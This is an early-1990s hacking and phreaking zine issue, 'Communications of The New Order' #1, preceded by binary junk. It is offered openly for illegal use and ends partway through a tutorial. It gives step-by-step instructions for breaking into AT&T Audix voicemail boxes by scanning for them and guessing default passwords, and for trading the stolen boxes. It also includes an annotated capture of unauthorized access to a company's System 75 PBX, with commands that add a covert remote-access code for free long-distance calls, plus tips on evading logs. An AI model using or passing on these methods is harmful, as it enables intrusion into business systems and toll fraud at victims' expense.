 M BOBO ˥    d H H H H H H                            N       H         ˉ                ˖E            B.
  7Pr    ϺnJG>    @3B3\DFG>                       ˨                      -       Z                                                 l    `   E            B.
  7Pr    ϺnJG>    @3B3\DFG>   x    H H    @Rd(   hh    @    d         '                                                                                                                 O   O                         l     /   j          0         iWt                           N N                                   XT       @Wt`                    H            ͇        j                    |                X  !             ( | DSET   O  b  b       i GE    ˯             d (              ͺ (              ͏ (              d (              G| (               (               (              t (              ˆ (               D (              #ˮ (              '  (              * (              -ˏ (              1˧ (              4ˀ (              7 (              :ͻ (              > (              Bl (              Ch (              Fd (              J` (              N0\ (              QHX (              TT (              XP (              \L (              _H (              bD (              ed@ (              h< (              l8 (              p4 (              t0 (              x, (              z( (              }$ (                (              ь (               (              Q (              [ (              M (               (               (                (              ʸ (              ʯ (              q (              ʽ (               (               (              ʉ (              ʇ (              mʋ (               (              Iʑ (              ʖ (               (              Pʻ (              ʃ (              ʿ (              ʺ (               ʏ (              ʥ (              ʀ (              ͹ʨ (              Ӄʮ (              lʧ (              [ʆ (              > (               (              (              (             	1 (             
  (             q (              P              Z(           M       N                                  >      ?                              (      )      *      +      S      T                                          (      )      _      `                                          .      /      \      ]                                                            	      ?      @      j      k                                                                              W      X                              $      %      o      p                                          c      d                                                	       	      	      	R      	S      	n      	o      	      	      	      	      	      	      	      	      	      	      
/      
0      
{      
|      
      
                  c      d                              T      U                              
=      
>      
      
      
      
      
      
      
      
      6      7                                          D      E      F      G                              2      3                                           Z      [      \      ]                                          $      %      r      s                                                                        	      R      S                              /      0      1      2      3      4      5      6      7      8      J      K      ]      ^                              9      :                                          f      g                              J      K                                                                                                                              .      /      m      n                              !      "      ]      ^                                          M      N                                                                                                      Q      R                              9      :                                                      -      .      {      |                                           R      S                                                             !      :      ;      T      U      V      W                               D       E                                  !0      !1      !      !      !      !      !      !      !      !      "5      "6      "      "      "      "      "      "      "      "      "      "      #
      #      #      #
      #Y      #Z      #      #      #      #      #      #      $      $      $3      $4      $e      $f      $      $      $      $      $      $      %*      %+      %[      %\      %      %      %      %      &      &
      &=      &>      &p      &q      &      &      &      &      &      &      '      '       '!      '"      'K      'L      'u      'v      '      '      '      '      (       (!      (Z      ([      (      (      (      (      (      (      (      (      )3      )4      )~      )      )      )      *      *      *m      *n      *      *      +      +	      +
      +      +2      +3      +d      +e      +      +      +      +      +      +      ,"      ,#      ,h      ,i      ,j      ,k      ,l      ,m      ,      ,      ,      ,      ,      ,      ,      ,      -L      -M      -      -      -      -      .2      .3      .4      .5      .a      .b      .      .      .      .      /      /      /?      /@      /x      /y      /      /      /      /      /      /      00      01      02      03      04      05      0O      0P      0j      0k      0l      0m      0      0      1      1      1Q      1R      1S      1T      1}      1~      1      1      1      1      2      2      2R      2S      2      2      2      2      3      3      3P      3Q      3      3      3      3      3      3      3      3      3      3      3      3      4       4      4      4      4      4      4^      4_      4      4      4      4      5<      5=      5      5      5      5      5      5      5      5      6@      6A      6      6      6      6      7%      7&      7O      7P      7Q      7R      7{      7|      7      7      7      7      7      7      7      7      81      82      8~      8      8      8      9      9      9*      9+      9v      9w      9      9      9      9      9      9      9      9      :      :      :      :      :      :      :      :      :      :      :O      :P      :      :      :      :      ;      ;      ;;      ;<      ;z      ;{      ;      ;      ;      ;      ;      ;      <       <      <      <      <      <      <^      <_      <      <      <      <      =D      =E      =      =      =      =      >0      >1      >}      >~      >      >      >      >      ?      ?      ?_      ?`      ?      ?      ?      ?      @F      @G      @      @      @      @      A      A      A      A      A)      A*      AK      AL      Am      An      A      A      A      A      A      A      A      A      A      A      B      B      B      B      B-      B.      B/      B0      B1      B2      BA      BB      BQ      BR      Ba      Bb      B      B      B      B      B      B      B      B      B      B      C      C      C3      C4      Cs      Ct      Cu      Cv      Cw      Cx      C      C      C      C      C      C      D      D      DE      DF      D{      D|      D      D      D      D      D      D      D      D      D      D      E      E      E      E      E      E       E>      E?      E      E      E      E      F&      F'      FU      FV      Ff      Fg      Fw      Fx      F      F      F      F      F      F      G       G      GD      GE      G      G      G      G      H
      H      HP      HQ      H      H      H      H      H      H      H      H      I1      I2      IO      IP      IQ      IR      IS      IT      Ip      Iq      I      I      J      J      J      J      JT      JU      J      J      J      J      J      J      K       K!      Kn      Ko      K      K      L
      L      LV      LW      L      L      L      L      L      L      L      L      L      L      MF      MG      Ma      Mb      M      M      M      M      ND      NE      N      N      N      N      N      N      N      N      O
      O      OY      OZ      O      O      O      O      O      O      O      O      P      P      P+      P,      Pv      Pw      P      P      P      P      P      P      Q      Q      Q%      Q&      QH      QI      Qk      Ql      Q      Q      Q      Q      Q      Q      Q      Q      R      R      R=      R>      R`      Ra      R      R      R      R      S      S      Sg      Sh      S{      S|      S      S      S      S      TJ      TK      T      T      T      T      T      T      U-      U.      Uw      Ux      U      U      V      V      V>      V?      V      V      V      V      V      V      V      V      V      V      V      V      WJ      WK      W      W      W      W      X      X      Xh      Xi      X      X      X      X      X      X      Y      Y	      Y3      Y4      Y^      Y_      Y`      Ya      Ys      Yt      Y      Y      Z      Z      ZK      ZL      Z      Z      Z      Z      [      [      [_      [`      [      [      [      [      [      [      [      [      [      [      \      \      \d      \e      \      \      \      \      ]      ]      ]R      ]S      ]g      ]h      ]      ]      ]      ]      ]      ]      ^      ^      ^=      ^>      ^i      ^j      ^      ^      ^      ^      ^      ^      ^      ^      _      _      _`      _a      _b      _c      _d      _e      _      _      _      _      `      `      `      `	      `L      `M      `      `      `      `      a	      a
      aH      aI      an      ao      a      a      a      a      a      a      a      a      b      b      be      bf      bg      bh      bi      bj      b      b      b      b      c4      c5      cR      cS      c|      c}      c      c      c      c      c      c      c      c      c      c      c      d       d      d      d      d      de      df      dq      dr      d      d      e      e      e2      e3      ea      eb      ec      ed      e      e      e      e      e      e      e      e      f6      f7      fy      fz      f      f      f      g       gB      gC      g      g      g      g      g      g      g      g      hA      hB      hX      hY      h      h      h      h      h      h      h      h      h      h      iA      iB      i      i      i      i      j      j      j/      j0      j1      j2      j      j      j      j      k      k      kh      ki      k      k      l      l      l9      l:      l;      l<      lM      lN      lq      lr      l      l      l      l      l      l      m@      mA      m      m      m      m      m      m      n      n      n      n      n      n      n"      n#      nO      nP      n      n      n      n      n      n      o      o      o      o       om      on      o      o      p
      p      p\      p]      p      p      p      p      q-      q.      q/      q0      qA      qB      qe      qf      q      q      q      q      q      q      r4      r5      r~      r      r      r      r      r      s0      s1      sO      sP      s      s      s      s      s      s      s      s      s      s      t      t      tf      tg      t      t      t      t      u      u      u      u	      uV      uW      u      u      u      u      vC      vD      v      v      v      v      w      w      w      w      w(      w)      wL      wM      wj      wk      w      w      w      w      x      x      xe      xf      x|      x}      x      x      x      x      x      x      x      x      y      y      y.      y/      yX      yY      yp      yq      y      y      y      y      y      y      y      y      y      y      z      z      za      zb      z      z      z      z      z      z      z      z      z      z      {
      {      {[      {\      {]      {^      {      {      {      {      {      {      {      {      |       |!      |"      |#      |M      |N      |      |      |      |      }#      }$      }j      }k      }      }      }      }      }      }      ~H      ~I      ~      ~      ~      ~      ~      ~      ~      ~      ~      ~      0      1                                                                   N      O                  Č      Ĝ                  f      g                              ś      Ź                  !      "      m      n      ǐ      ǚ                              -      .      {      |      ɿ      ɡ                  K      L      `      a      b      c      z      {      |      }      Ѣ      ѣ      Ѡ                        ь      ќ                   !      "      #      $      %      &      '      (      d      e      ֢      ֣      և      ַ                  [      \                                          ܢ      ܣ      ܩ      ܙ      ܘ      ܯ      D      E                              +      ,      w      x                              Q      R                                                                              (      )      b      c                                          P      Q                                          ?      @      z      {                              ,      -      j      k                              #      $      ]      ^      _      `      a      b      m      n      y      z                              Z      [      q      r      s      t      u      v                                                                  *      +      U      V      W      X      Y      Z                              <      =                              !      "      K      L      M      N                              :      ;                              "      #      F      G      H      I                              1      2      ~                                    e      f                                          H      I                              *      +      x      y                                          "      #      $      %      &      '      w      x      y      z      {      |      }      ~                                          ;      <      z      {                              7      8      v      w                                                                              `      a                                                                   +      ,      v      w                  
                                           !      /      0      x      y                                                                  Q      R                                                                  ,      -      y      z                              [      \                                                                                          *      +      >      ?      R      S      f      g      z      {                                                                              1      2      3      4      5      6      <      =      C      D                                                                  3      4      L      M      N      O      _      `      p      q                              Y      Z                              )      *      +      ,      -      .      =      >      M      N                              8      9                  ߓ      ߔ            ߸                                                       f      g                              K      L                                                  !      4      5      6      7      8      9                                                                  g      h                              O      P                                                      %      &      W      X                                                                  $      %      S      T      V      W      ƶ            ƾ      ƈ      .      /      1      2      I      J      _      `      b      c      ب                        H      I                                                      ^      _                                    	      ;      <      v      w                              V      W      X      Y                              I      J                              5      6                                          T      U                              &      '      )      *      z      {                                                                              N      O                                                      l      m                  
            \      ]                              K      L                              =      >                              #      $      r      s                  
            Y      Z                              E      F      M      N      P      Q      [      \      f      g      i      j                  
            Z      [                              0      1      ~                                    H      I                                          &      '      t      u                              \      ]                              H      I                                          $      %      t      u                              a      b                                          >      ?                              $      %      s      t                              #      $      &      '      G      H      h      i      k      l                              Q      R                              9      :                  ò            &      '      w      x      խ      ի                  Y      Z      |      }                                          .      /      P      Q      q      r                                          *      +      -      .      [      \      |      }                                                      b      c                                                                              k      l                  
            U      V                              E      F                                                                              S      T                              <      =                                                      6      7      d      e      g      h                               J      K                              -      .      ~                                     o      p                  	      
      U      V      c      d      f      g                              N      O                              9      :                                           W      X      Z      [                              A      B                              *      +      y      z                              `      a                              @      A      C      D                                                      h      i                              V      W      Y      Z                              ?      @                        ³      %      &      q      r            ʿ                  "      #      %      &      u      v                                          A      B                  ˼      ˇ      .      /      u      v      ȶ            ȩ      ș      Ⱦ      Ȉ      D      E                  ͛      ͹      .      /      {      |      Π                        B      C      E      F                  Ϸ      ς      /      0      D      E      G      H                  ̉            1      2                  ӌ      Ӝ                  e      f      h      i      Ԑ      Ԛ            	      X      Y                              B      C                              ҡ      Ҭ      Ҝ      Җ      ғ      Ҕ                   k      l      ڎ      ڏ                  D      E      G      H                  ۺ      ۝            ۿ            
      [      \      ٕ      ٶ                  D      E                                                            	                  [      \                                                      d      e                                                  !      o      p                                                                                    	      >      ?      u      v      w      x      y      z            п                  N      O                        ן                  #      $      %      &      k      l      ݙ      ݴ      ݽ            +      ,      l      m                                          c      d                  ޫ      ޻      ޯ            (      )      O      P                                          )      *      t      u                              K      L                             )     *     u     v               
          S     T                         /     0     {     |                         ]     ^                         !     "     #     $     %     &     v     w     x     y     z     {                                                                           `     a                         C     D                                             #     $     %     &     E     F                         	1     	2     	h     	i     	j     	k     	     	     	     	     
"     
#     
r     
s     
     
     	     
     D     E     F     G                                             6     7                         
      
!     
n     
o     
     
                                   l     m                         S     T                         :     ;     <     =                         !     "     p     q                                                                       !     "     #     [     \                                                                           *     +     6     7                                    m     n               	     
     U     V     d     e     f     g     h     i       
                   l  ȏ  ȧ  Ȩ  ȿ  ȥ  zȻ  jȺ  #[Ȗ  'Gȃ  +C  //  3*ȇ  7ȑ  :Ƚ  >ȋ  B   F ȉ  J    N  R  Vȸ  Z  ^  b  f  jS   nD   rD(  v/  z0  ~$  ň8  ,  @  4  H  <  P  D  X  eL  ^d  :  8T  )  &           Â          s  Z  N  +        ݼ    | x t p         ______         ______     ____________       ____      ___     ______

      /  ____|\      /      \   |____    ____|\    /   | \  /   / |  /      \

    /  /  ____\|   /   __    |\  \_/   /|_____\| /     |  /   /  / /   __    |\

  /  /  /        /   /__/   /  | /   /  /      /   /|  |/   /  / /   /__/   / |

/  /__/______   |         /  / /   /  /      /   /  |     /  /  |         /  /

|____________|\ |\_____ /  / /__ /  /      /___/  / |___/  /    |\_____ /  /

|_____________\| \|____| /  |___| /       |___ |/   |___|/       \|____| /



                                   ____

                                  /    \ --- 

                                /        \   \ __  

                              /     /\     \   \  \   

                           _/______|_/    /   /   / \  

                          |          |  /   /   /  / 

                          |    ---\( |/   /   /  / 

                          |         \|\(/\(/ \(/    

                            |                   |   

                          /                  /

                        /    \             /

                      /         \     ___/

                                     /  

                                   /    

                                 /      



                      Communications of The New Order

                                 Issue #1

                               Summer, 1993



                   "The best things in life are toll-free."

                                                     AT&T





             Editor......................................DeadKat

             Cheerleader.................................Karb0n

             Rebel without a pause.......................Panther Modern

             Fund raiser.................................Cavalier

             The K-radiest...............................Jewish Lightning

             Flatline engineer...........................Nuklear Phusion

             
  
             Thanks to:  Phreddy!, god, Control-C (the new one), Nitro-187,

             RDT (you guys rule), VirtualCon (NOT!), Lucifer and the Coders,

             Disk Jockey, Visionary, Kamikaze, John Falcon, Cosmos, Pee Wee,

             and all the negligent system administrators of the world...







<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>

                          

                          

                          

                          ___/\/INTRoDUCTIoN\/\___





Welcome to CoTNo!  This publication is the prodigy of The New Order, Colorado's

best hacking group.  We have created this 'zine to help teach what we have

learned and discovered from our combined years of experience.  This is not

intended to be an ultra-technical collection of barely useful information, but

rather a forum for spreading current H/P/A knowledge and practices to the 

newer members of the 'scene'.  You will not find mind-numbing overly techni  cal

reports here.  Nor will you be wasting your time and hard-drive by downloading

useless articals on non-H/P/A topics like gambling and car theft.  All articals

contained in CoTNo have useful applications in today's heavily computerized

and automated society.  Some well experienced hackers may find these texts to

be old hat, but we feel the scene has been dying because of a lack of basic

hacking tutorials.  The goal of the writers of this publication and the 

members of TNo is to educate and enlighten in order to recreate the booming

scene of the 80's.



The New Order (TNo) are the main writers and supporters of this 'zine.  We

are composed of hackers, phreakers, and "hairy-eyed anarchists" from the

Colorado area. We recently recieved some minor publicity in a comment found

in The Seed Magazine: Denver's Rag of Underground Culture.  The following is

an exerpt from the June/July '93 issue:



     "Hackers - no longer a small underground phenomenon, these computer whiz-

     kids have b  ecome a highly organized network of post-modern renegades.

     With everything in our lives being computerised, today's hackers are able

     to gain unbelievable access into just about everything.  They communicate

     to each other via BBS (Bulletin Board System) and trade tips on everything

     from music to ripping off the phone company.  The buzz around town is

     about Flatline, a BBS run by the hacking crew, TNO."



Not exactly the front page of Time, but at least this was a POSITIVE statement

by the media on the hacking phenomenon.



We accept submissions to CoTNo from anyone who has willingness to teach and

can get on Flatline.  There will also be a CoTNo mailing address soon.  This

mag' will be published on a quarterly basis.





DISCLAIMER

~~~~~~~~~~

This publication contains information pertaining to illegal acts.  The use

of this information is intended solely for evil purposes.  The editors, 

writers, and publishers of this publication take no responsibility for any

leg  al acts committed using this information.  If you plan on using this 

information for destructive purposes, read on.  Otherwise...FUCK OFF!









TABLE OF CONTENTS

~~~~~~~~~~~~~~~~~

 1.  CoTNo Introduction.......................................DeadKat

 2.  How to Hack Audix VMB's..................................DeadKat

 3.  System 75 Hacking (An Online Tutorial)...................Panther Modern

 4.  UNiX Default List........................................TNO Hacking Crew

 5.  HoW To MAiL FoR FREE.....................................Karb0n

 6.  How to Red Box...........................................DeadKat

 7.  Field Phreaking I........................................The Third Cartel

 8.  Field Phreaking II.......................................The Third Cartel

 9.  How to Make a ZAPPER GUN.................................Panther Modern

10.  Comments on Phrack 42....................................Karb0n

11.  CoTNo Conclusion.........................................DeadKat











<CoT  No>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>







                 (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\ 

                 (*)                                 (*)\|   

                 (*)            HOW TO HACK          (*)\|

                 (*)               AUDIX             (*)\|

                 (*)               VMB'S             (*)\|

                 (*)                                 (*)\|

                 (*)                By               (*)\|

                 (*)            |>ead |<at           (*)\|

                 (*)                                 (*)\|

                 (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\|

                  \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\|

                   





PREFACE

-------



        A VMB, in case you don't know, stands for Voice Mail Box.  A VMB works

like a multiuser answering machine.  A company will puchase a VMB so its 

employees will be able to leave messages   to each other.  Each employee will

have a seperate box number assigned to him and be given a "default password"

for his VMB.  The employee is then able to leave a greeting on his mail box

and change the password.  Whenever someone calls him, they will get his VMB

if he does not answer his line.  The caller can then leave a message to the

employee.



        Hackers and Phreaks steal VMB's so they can contact each other and 

spread information around.  You can give them to friends, you can trade them

for access on boards, or keep them for yourself.  Some boxes even have the 

ability to call out so you can use them for phreaking!



        The Audix or Audio Information Exchange system sold by AT&T is one of 

the better VMB's on the market.  It has many message options, it is highly 

configurable, and has many security options.  Lucky for us, it also has some 

neat options that make it very easy to hack!





SCANNING FOR AUDIX VMB'S

------------------------



        To find a V  MB, you will have to scan.  Either pick a popular business

exchange in your area code (like 669, 721, 220, etc.), or try the riskier 800 

area code.  The 800 area code VMB's are better but Ma Bell's computers (ESS) 

keep a list of any number that makes excessive calls to 800 numbers.  Do your

scanning at night so you won't have to worry about reaching someone at their

desk.  Start at 0000 and work your way to 9999 sequentially.  Write down any 

interesting numbers you find.  If you get some kind of answering machine, mark

it as a possible VMB.



        When your done scanning, recall each of the possible VMB's.  Some 

Audix systems will answer with the greeting "Welcome to Audix..." while others

will just begin with the employee's greeting.  Press *7 (the asterick then the

seven).  You will here "Welcome to Audix..." if it is an Audix VMB.





WHAT TO DO ONCE YOU FIND ONE

----------------------------



        Now that you have a list of Audix VMB numbers, call one of them and

g  et yourself a box!  When you first reach a box, you are in record mode.  You

have a number of options available to you in this mode:



                KEY             ACTION

                ---             ------

                1               Begin recording.

                1               Stop recording.

                *#              Approve message.

                *1              Review message.

                *3              Delete message.

                2               Rewind message.

                3               Playback message.

                6               Advance message a few seconds.

                5               Replay the last few seconds.

                4               Turn volume up.

                7               Turn volume down.

                8               Slow down message.

                9               Speed up message.



You also have the following Audix master functions available to you:



                KEY             FUNCT  ION

                ---             --------

                *R              To retrieve a box.

                *H              To get help at any time.

                *T              To transfer to another box.

                *W              To have the system wait.

                **N             To access the directory.





        To get your own box, you must first find some empty boxes.  While you

are in record mode, press *T.  The system will tell you to enter either a 

three or four number digit number extension and the pound sign.  Remember

how many digits the box numbers are.  Now press **N. This will take you to the 

directory.  Press *A to look up boxes by their extension.  Start scanning for

boxes sequentially.  Start at either the highest number or lowest number (999

or 000) and work your way to the other end.  To scan a box number, enter the

box number and press the pound sign.  You will hear one of three responses:



        1.  The name of the box owner.

        2.  "Box   number XXX is not a valid box".

        3.  "Box number XXX".



If you hear either response one or response two, go on to the next box.  If 

you hear response 3, BINGO!  You just found an empty box so write it down and

move on to the next box.  After you are finished scanning, press *#.





HOW TO BREAK INTO AN EMPTY BOX

------------------------------



        While in record mode, press *R.  You will here a message like "Welcome

to the Audix Activity Menu..."  Enter one of the empty box numbers you found

and press the #.  It will now tell you to enter your password and press the #.

The password will be a three or four digit combination of numbers. The default 

password is usually something obvious so try some of the following:



                   PASSWORD            NOTE

                   --------            ----

                   Box Number          This is the most common 

                   No password         Just press pound, also common

                   1234                  \

                   9999                  > Occasionally

                   1111                /



Once you figure out the default password for one empty box, you can access all

the boxes you found during your scan by using the default.





WHAT TO DO ONCE YOU'RE IN

-------------------------



        You will know when you have broken into a box when you hear a message

like "Extension XXX, you have no new messages."  You can now set up your 

personal box.  The following is a list of the functions available to you:



                KEY             FUNCTION

                ---             --------

                 1              Create a message.

                 2              Retrieve messages left for you.

                 3              Change your greeting.

                 4              Check out messages left by you.              

                 5              Change password.

                 6              Change call notification information.

                  **R             Relog into your box.

                **N             Enter the directory.



The first thing you should do is change your password!  You don't want 

anybody to hack YOUR box.





ADVANCED AUDIX

--------------



        Sometimes you will find boxes that have no name, but don't have a 

default.  Transfer to the box and check it out.  It might be a carrier.

Audix's are usually found on System 75/85 PBX's which can be accessed via

modem.  Call it with your modem and if you get a prompt that looks like 

Logon: you have scored big.  A tutorial on hacking System 75/85's can be

found elswhere in this 'zine.



If you transfer to the box and you hear a quick beep without hearing any type

of greeting, you have found a bridge.  Have a friend call the system and

transfer to the same box after you have and see if you can talk to each 

other.  All System 75/85's have the capability to bridge extensions but this

option is rarely used.  If you find a bridge, only call it lat  e at night so

you don't stumble into valid conference.



                                        

CONCLUSION

----------



        You should be a master at hacking Audix VMB's now.  You can use many 

similar techniques on other brands of VMB's too.  Be conservative with your

boxes.  The more boxes you snag from one company, the more likely they will

notice you and shut you out.  If you do end up with 500 boxes, use them to 

trade with.  You can get better access on boards, money, or equipment for 

them.  Have Phun!

__________________________________________________________________________

(C)opywrong 1993, DeadKat Inc.

All wrongs denied.





<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>                     









                          /\/System 75 hacking\/\

                          /\/An online tutorial\/\

      -=Captured from a very generous company located in Denver=-

           -=My thanks go out to them for u  se of their PBX=-

                  --Intro by Panther Modern TNO/TBF--

          --Hacking of the system by Panther Modern TNO/TBF--

                --Editing and revising from |>ead|<at--

  >Special thanks to Dead Kat for teaching me how to do this stuff..<



  

INTRO

~~~~~

  System 75/85's..The gateway to the world of the PBX...If one can hack these 

machines, one has the ability to generate many codes for himself, and his 

fellow phreakers/hackers to use and enjoy.  Hacking these machines can be 

very fun, but if one does not know what he's doing, it could be frustrating 

and potentially risky. That's why I am writing this text.  This file includes 

captures from two hacks I did.  In the first hack, I will show you how I went 

thru, saw that the company did not have a PBX, and made my own for my own 

personal gateway to free LD.  In the second hack you will see how I simply 

looked, saw the PBX, and quickly found the correct trunk, changing nothing.  

  

  Version   2 is definately the better way to hack a system.  If you change 

things, it will show up on the system log.  Along comes a system 

administrator to read the log, and yer busted.  But if you don't change 

anything, no one will ever know you were there...Of course, many times, it 

becomes nescessary to change things, if the company dosn't already have a PBX 

installed...You must make your own.  For ease of reading, I have gone thru 

and edited/commented on everything I did in both hacks.  Hopefully I made 

it easy to understand..Good luck hacking System 75!



                 

CONVENTIONS USED IN THIS ARTICAL

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.  The command prompt is

     enter command:



2.  Resulting screens begin and end with dashes.                



3.  Comments are inclosed by brackets. [ ]



4.  Emulation is Bell 513.





THE FIRST HACK

~~~~~~~~~~~~~~

CARRIER 1200  

[1200 baud is a good way to recognise a sys75]



KEYBOARD LOCKED, WAIT FOR LOGIN

Login: XXXXX

Password: XXXXXX   X

[I don't want to include any passwords in this file]

Terminal Type (513, 4410, 4425): [513]

[513 is a default bell prefix.  It is about the same as VT100]





___________________________________________________________________________

                        

                        

                        

                        Copyright (c) 1986 - AT&T

                   Unpublished & Not for Publication

                          All Rights Reserved







___________________________________________________________________________

[I like this screen...<G>]

 

 

 enter command: display rem<<

[All you really need is DIS, not display.  Try DIS HELP, also, LIST HELP]

____________________________________________________________________________

display remote-access                                           Page  1 of  1

                                REMOTE ACCESS

               

               

               Remote Access Extension:

                   Barrier Code Length: 4

BARRIER    CODE ASSIGNMENTS (Enter up to 10)

        

        Barrier Code    COR                    Barrier Code    COR

     1:                 1                    6:                 1

     2:                 1                    7:                 1

     3:                 1                    8:                 1

     4:                 1                    9:                 1

     5:                 1                    10:                1





____________________________________________________________________________

[As you can see, no remote access ports are set up.  No PBX, and no codes.

Code length is four digits.]





 enter command: dis trunk 1

[we will now look at all 99 trunks, to find the rite one to use..]

_____________________________________________________________________________



display trunk-group 1                                           Page  1 of  5

                                TRUNK GROUP



Group Number: 1                    Group Type: co            SMDR Reports? y

     Group Name: main pool                   COR: 1                      TAC: 76

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60           Night Service:

Queue Length: 0                                      Incoming Destination: 200

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: toll    Allowed Calls List? n



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervision Timeout:                    Suppress # Outpulsing? n

_____________________________________________________________________________

[First we look at night service, and incoming destination, recording the

numbers to hardcopy.  We also note the trunk type, and COR number]

  



[We type <ESC>[U to get to the next page of text.]

_____________________________________________________________________________

display trunk-group 1                                             Page  2 of  5

                                 

                                 TRUNK GROUP 



GROUP MEMBER ASSIGNMENTS

                 

                 Port      Name         Mode         Type    Answer Delay

              1: A0301    xxxxxxx

              2: A0302    xxxxxxx

              3: A0303    xxxxxxx

              4: A0304    xxxxxxx

              5: A0305    xxxxxxx

              6: A0306    xxxxxxx

              7: A0307    xxxxxxx

              8: A0308    xxxxxxx

              9: A0401    xxxxxxx

             10: A0402    xxxxxxx

             11: A0403    xxxxxxx

             12: A0404    xxxxxxx

             13: A0405    xxxxxxx

             14: A0406    xxxxxxx

             15: A0407    xxxxxxx

__________________________________________  __________________________________

[Where name is, there will be fone numbers.  Record these so you will know

what number to dial in to while hacking.  I have removed the numbers for

security reasons.]

[Same process was done on the remaining trunks.  Always scan all 99, even

if you stop finding some.  There may be a good one...]

[If the trunk has both a night extension and a phone number listed on page

2, make a note of it.  Use the command dis cor to see the the trunks

restrictions.  FRL should equal 7.  If not, change it to 7 or find another

trunk.]

[BTW - When done looking thru pages, type <ESC>Ow to return to prompt]

[What we found was a trunk which looked as if it was fairly unimportant.

Also, it didn't have a night extension.  This is important, because we want

to set up an after-hours PBX.  If we take over a daytime extension, the PBX

would most likely go down within 24 hours.]

[If, under the name column, there are strange numbers, like AT204, just 

disregard them, and go   on to the next trunk, these are internal extension

numbers.]





 enter command: dis dial<<

[This displays the dial plan for the system.  It will show you which digit

to start your remote extension (shown later) with.  Use a digit that says

EXTENSION.  As you can see, that digit here is 2.]

____________________________________________________________________________

display dialplan                                                  Page  1 of  1

                               

                               

                               DIAL PLAN RECORD

                             Area Code: XXX

                 ARS Prefix 1 Required? y

                  Uniform Dialing Plan? n



FIRST DIGIT TABLE

Digit  Identification   Number of       Digit  Identification   Number of

                        Digits                                  Digits

    1: fac                3               7: tac                  2

    2: extension          3               8: tac                  1

    3:                      0               9: fac                  1

    4:                    0               0: attendant            1

    5:                    0               *: fac                  2

    6: tac                2               #: fac                  2



_____________________________________________________________________________ 

 

 

 enter command: dis allow

[This will display the allowed calls/area codes.  If your PBX does not work

later on, check here, and try to add the correct area code you want to call]



___________________________________________________________________________

display allowed-calls                                             Page  1 of  1

                   

                   ALLOWED CALLS LIST (FOR TOLL RESTRICTION)

AREA/LONG DISTANCE CARRIER CODES ( Enter up to 10 )

         

         1: 800                         6:

         2: 911                         7:

         3: 950                         8:

         4:                             9:

           5:                            10:





____________________________________________________________________________

[This system can call 800's, 950's, 911, as well as long distance numbers.]





 enter command: list help

____________________________________________________________________________

Please enter one of the following object command words:



abbreviated-dialing      groups-of-extension      personal-CO-line

aca-parameters           hunt-group               pickup-group

bridged-extensions       intercom-group           station

configuration            measurements             term-ext-group

coverage                 modem-pool               trunk-group

data-module              performance

Or press CANCEL to cancel the command

  Object command word omitted; please press HELP





____________________________________________________________________________

[List is similar to DIS, except that none of it's factors can be changed.]





 enter command: list groups-of-  extension 200

[We are attempting to find an empty extension to set up the remote on.  Find

an extention that is not being used and write it down.  The screens have been

omitted for brevity's sake.]

[We will now set up a remote extension.]

 

 enter command: list group 299<



list groups-of-extension 299

  Extension not assigned

[We first found an empty extension]



 enter command: ch rem<

[we proceeded to add it to the remote access.  I will put {'s around what

we added.]

____________________________________________________________________________

change remote-access                                              Page  1 of  1

                                

                                REMOTE ACCESS



               Remote Access Extension: {299}

                   Barrier Code Length: 4

BARRIER CODE ASSIGNMENTS (Enter up to 10)

        

        Barrier Code    COR                    Barrier Code    COR

     1: {3323}          1                    6:                 1

     2:                   1                    7:                 1

     3:                 1                    8:                 1

     4:                 1                    9:                 1

     5:                 1                   10:                 1

  

  Command successfully completed

_____________________________________________________________________________

[We added in our code, and our remote access extension, and then save

by typing <ESC>SB ]  

[We added our extension, and our code (barrier code)] 





 enter command: dis trunk 9<<

[We looked back on our hardcopy notes, and decided that trunk 9 would be 

appropriate to add our code to.  We re-display just to make sure]

____________________________________________________________________________

display trunk-group 9                                             Page  1 of  5

                                

                                TRUNK GROUP



Group Number: 9                      Group Type: co            SMDR Reports? y

  Group Name: fax wild line               COR: 1                      TAC: 79

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60           Night Service:

Queue Length: 0                                      Incoming Destination: 267

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: code



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervision Timeout:                    Suppress # Outpulsing? <

display trunk-group 9

  Command aborted

____________________________________________________________________________





 enter command: ch trunk 9

[Once again, changes I made will    be in {'s]

____________________________________________________________________________

change trunk-group 9                                              Page  1 of  5



                                TRUNK GROUP



Group Number: 9                    Group Type: co            SMDR Reports? y

  Group Name: fax wild line               COR: 1                      TAC: 79

   Direction: two-way        Outgoing Display? n         Data Restriction? n

 Dial Access? y                Busy Threshold: 60           Night Service: {299}

Queue Length: 0                                      Incoming Destination: 267

   Comm Type: voice                                 Digit Absorption List:

    Prefix-1? n                   Restriction: code



TRUNK PARAMETERS

            Trunk Type: loop-start

    Outgoing Dial Type: tone

     Trunk Termination: rc                    Disconnect Timing(msec): 500

        ACA Assignment? n

                                                    Maintenance Tests? y

 Answer Supervi  sion Timeout:                    Suppress # Outpulsing? n

  Command successfully completed

____________________________________________________________________________

[All we had to do was add our remote extension to Night Service]

[..And save it with <ESC>SB ]

[You should now have a ready-to-use PBX!!!!!!  Check page 2, that's yer after 

hours dial in number.]

 



 enter command: dis trunk 9

[We check again to make sure our changes came thru correctly]

____________________________________________________________________________

